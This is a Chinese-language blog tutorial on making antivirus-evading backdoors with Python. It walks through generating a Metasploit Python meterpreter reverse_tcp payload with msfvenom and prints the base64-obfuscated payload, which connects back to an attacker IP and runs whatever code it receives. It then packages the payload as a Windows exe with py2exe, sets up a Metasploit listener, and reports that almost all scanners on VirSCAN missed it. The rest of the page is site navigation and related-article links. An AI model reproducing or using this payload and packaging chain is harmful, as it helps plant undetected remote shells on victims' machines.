首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe,获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org 

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

使用Python进行防病毒免杀解析

- Author -

Bypass

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
Python通过DOM和SAX方式解析XML的应用实例分享
Nov 16 Python
python好玩的项目—色情图片识别代码分享
Nov 07 Python
Python实现读取字符串按列分配后按行输出示例
Apr 17 Python
详解Python 字符串相似性的几种度量方法
Aug 29 Python
Python 70行代码实现简单算式计算器解析
Aug 30 Python
Python函数的默认参数设计示例详解
Dec 01 Python
基于Python实现扑克牌面试题
Dec 11 Python
django model object序列化实例
Mar 13 Python
python os模块常用的29种方法使用详解
Jun 02 Python
解决python便携版无法直接运行py文件的问题
Sep 01 Python
Python如何telnet到网络设备
Feb 18 Python
如何使用pdb进行Python调试
Jun 30 Python
python 使用shutil复制图片的例子
Dec 13 #Python
基于python traceback实现异常的获取与处理
Dec 13 #Python
python 实现批量替换文本中的某部分内容
Dec 13 #Python
django多种支付、并发订单处理实例代码
Dec 13 #Python
Python+OpenCV+图片旋转并用原底色填充新四角的例子
Dec 12 #Python
Python+OpenCV 实现图片无损旋转90°且无黑边
Dec 12 #Python
使用python去除图片白色像素的实例
Dec 12 #Python
random(1) 指针(1) MapReduce(1) pyqt5(3) DFA(1) pycharm(6) linux(15) pygame(3) 切片(1) Slice(1)
You might like
PHP中feof()函数实例测试
2014/08/23 PHP
Laravel模板引擎Blade中section的一些标签的区别介绍
2015/02/10 PHP
为何说PHP引用是个坑,要慎用
2018/04/02 PHP
JavaScript中的null和undefined区别介绍
2015/01/01 Javascript
javascript实现动态统计图开发实例
2015/11/21 Javascript
JS生成不重复的随机数组的简单实例
2016/07/10 Javascript
etmvc+jQuery EasyUI+combobox多值操作实现角色授权实例
2016/11/09 Javascript
angularjs过滤器--filter与ng-repeat配合有奇效
2017/04/20 Javascript
jQuery Ajax向服务端传递数组参数值的实例代码
2017/09/03 jQuery
Node.js 使用递归实现遍历文件夹中所有文件
2017/09/18 Javascript
vue实现类似淘宝商品评价页面星级评价及上传多张图片功能
2018/10/29 Javascript
javascript获取元素的计算样式
2019/05/24 Javascript
使用vue制作滑动标签
2019/09/21 Javascript
iSlider手机端图片滑动切换插件使用详解
2019/12/24 Javascript
如何基于JavaScript判断图片是否加载完成
2019/12/28 Javascript
解决qrcode.js生成二维码时必须定义一个空div的问题
2020/07/09 Javascript
js实现表格单列按字母排序
2020/08/12 Javascript
Python使用scrapy采集数据时为每个请求随机分配user-agent的方法
2015/04/08 Python
python:print格式化输出到文件的实例
2018/05/14 Python
numpy 对矩阵中Nan的处理:采用平均值的方法
2018/10/30 Python
python添加模块搜索路径和包的导入方法
2019/01/19 Python
Python面向对象程序设计类的多态用法详解
2019/04/12 Python
在Tensorflow中实现leakyRelu操作详解(高效)
2020/06/30 Python
python自动化办公操作PPT的实现
2021/02/05 Python
CSS图片翻转动画技术详解(IE也实现了)
2014/04/03 HTML / CSS
HTML5: Web 标准最巨大的飞跃
2008/10/17 HTML / CSS
唤醒头发毛囊的秘密武器:Grow Gorgeous
2016/08/28 全球购物
校园招聘策划书
2014/01/09 职场文书
小学生美德少年事迹
2014/02/02 职场文书
项目总经理岗位职责
2014/02/14 职场文书
金融学专科生自我鉴定
2014/02/21 职场文书
民族学专业求职信
2014/07/28 职场文书
2015年毕业生自我鉴定模板
2014/09/19 职场文书
导游词之永泰公主墓
2019/12/04 职场文书
使用 JavaScript 制作页面效果
2021/04/21 Javascript
js 数组 fill() 填充方法
2021/11/02 Javascript